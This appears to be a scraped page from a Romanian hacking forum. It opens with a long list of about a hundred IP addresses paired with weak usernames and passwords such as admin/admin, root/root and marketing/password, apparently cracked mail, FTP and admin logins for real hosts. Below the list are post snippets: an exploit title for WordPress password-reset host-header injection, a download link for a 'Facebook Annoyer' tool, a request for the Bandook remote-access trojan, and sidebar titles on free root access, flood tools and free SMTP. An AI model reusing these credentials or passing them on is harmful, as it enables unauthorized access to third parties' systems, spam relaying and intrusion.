203.198.75.9,test,test 203.199.167.83,new,new 203.201.226.150,test,test 66.101.58.178,test,test 66.102.48.3,paul,paul 66.104.123.19,sales,sales 66.104.123.20,info,qwerty 66.104.123.23,info,qwerty 66.104.123.22,info,qwerty 66.104.123.28,info,qwerty 66.109.29.164,postmaster,password 66.109.29.163,postmaster,password 66.110.175.26,sales,sales123 66.110.203.254,sandra,sandra 66.113.138.47,test,test123 66.113.195.15,test,test123 66.117.193.84,ftp,ftp 66.117.234.170,sales,sales 66.118.190.38,admin,admin 66.118.190.39,admin,admin 66.124.77.29,admin,admin 66.128.3.220,admin,admin 66.129.166.132,webmaster,webmaster 66.132.219.131,sales,sales 66.132.213.44,root,root 66.132.213.42,root,root 66.132.213.41,root,root 66.132.213.45,root,root 66.132.240.66,postmaster,password 66.132.203.247,carlos,carlos 66.135.55.222,tony,tony 66.138.84.177,admin,admin 66.139.180.3,training,training 66.14.230.58,sales,sales 66.146.50.170,laura,laura 66.147.83.174,admin,admin 66.148.12.115,postmaster,password 66.148.71.104,admin,admin 66.148.224.170,admin,admin 66.150.143.132,sales,sales 66.152.121.93,admin,admin 66.153.110.226,admin,admin 66.153.72.66,admin,admin 66.155.168.90,admin,admin 66.155.240.22,admin,admin 66.155.193.122,admin,admin 66.155.228.86,admin,admin 66.155.236.2,admin,admin 66.159.204.170,sales,sales 66.159.249.208,spam,spam 66.159.249.209,spam,spam 66.159.249.42,spam,spam 66.160.136.194,sales,sales 66.160.132.51,info,info 66.160.137.85,spam,spam 66.160.138.234,newsletter,newsletter 66.160.190.70,contact,contact123 66.160.189.199,linda,linda 66.161.182.139,admin,admin 66.161.178.11,admin,admin 66.161.251.4,spam,spam 66.162.186.172,brian,brian 66.163.195.28,marketing,password 66.163.195.51,marketing,password 66.163.195.60,marketing,password 66.163.195.35,marketing,password 66.163.195.49,marketing,password 66.163.195.54,marketing,password 66.163.195.76,marketing,password 66.163.195.39,marketing,password 66.163.195.80,marketing,password 66.163.195.79,marketing,password 66.163.195.71,marketing,password 66.163.195.70,marketing,password 66.163.195.43,marketing,password 66.163.195.48,marketing,password 66.163.195.61,marketing,password 66.163.194.49,test,test123 66.163.194.48,test,test123 66.163.194.41,test,test123 66.163.194.42,test,test123 66.163.194.51,test,test123 66.163.194.53,test,test123 66.163.194.57,test,test123 66.163.194.40,test,test123 66.165.133.107,admin,admin 66.163.11.89,steven,steven 66.171.16.39,admin,12345 66.170.46.17,shop,shop 66.172.94.23,staff,staff 66.173.138.248,spam,password 66.17.42.212,office,office 66.178.161.110,admin,admin 66.178.231.220,admin,admin 66.179.182.25,lisa,lisa 66.178.181.13,demo,demo 66.178.181.19,demo,demo 66.178.181.20,demo,demo 66.178.181.12,demo,demo 66.178.181.4,demo,demo 66.173.117.226,merlin,merlin 66.184.119.98,admin,admin 66.18.46.204,spam,spam 66.184.33.235,marina,marina 66.186.9.11,office,123456 66.186.9.245,office,123456 66.186.9.240,office,123456 66.186.9.13,office,123456

May 3, 2012

1 point

Title: WordPress 2.3-4.7.5 - Host Header Injection in Password Reset

Mai baga boss doua zero-uri in coada. Pentru 50$ nu ma duc la magazin pe vremea asta.

June 18, 2017

-1 points

Facebook Annoyer - Send warning email or sms

Facebook Annoyer is a small tool i develop with the purpose of sending email or sms if possible to any facebook user. How to use: 1) Open the executable 2) Write the target email or phone number 3) Check if it's the target account (If not, right click and press "Go Back") 4) Choose from the options available 5) Click on continue 6) Close the tool or right click and press "Go Back" several times to target another facebook user Note: Normally it show two options, send the code by sms or by email... Download: http://www.mediafire.com/file/xkr56zpyftacuza/Facebook_Annoyer.rar Virus Analysis: https://www.garyshood.com/virus/results.php?r=583da3582707b6bfbbfe9a197a24bc4f

June 19, 2017

-1 points

Bandook RAT v1.35

Want to have this rat......

June 19, 2017

-2 points

Sign In

Nytro

Points

Posts

dancezar

Points

Posts

Massaro

Points

Posts

Hertz

Points

Posts

Popular Content

DefCamp 2017

Google Chrome - V8 Private Property Arbitrary Code Execution (Android)

Title: WordPress 2.3-4.7.5 - Host Header Injection in Password Reset

Storj.io - Cloud Storage / Rent your drive

Facebook Annoyer - Send warning email or sms

Cyber Security Challenge Romania

[TUTORIAL] RooT pentru FlooD / Scan Gratis

Smtp Gratis ;) destul de multe

Title: WordPress 2.3-4.7.5 - Host Header Injection in Password Reset

Facebook Annoyer - Send warning email or sms

Bandook RAT v1.35

Browse

Activity

Pages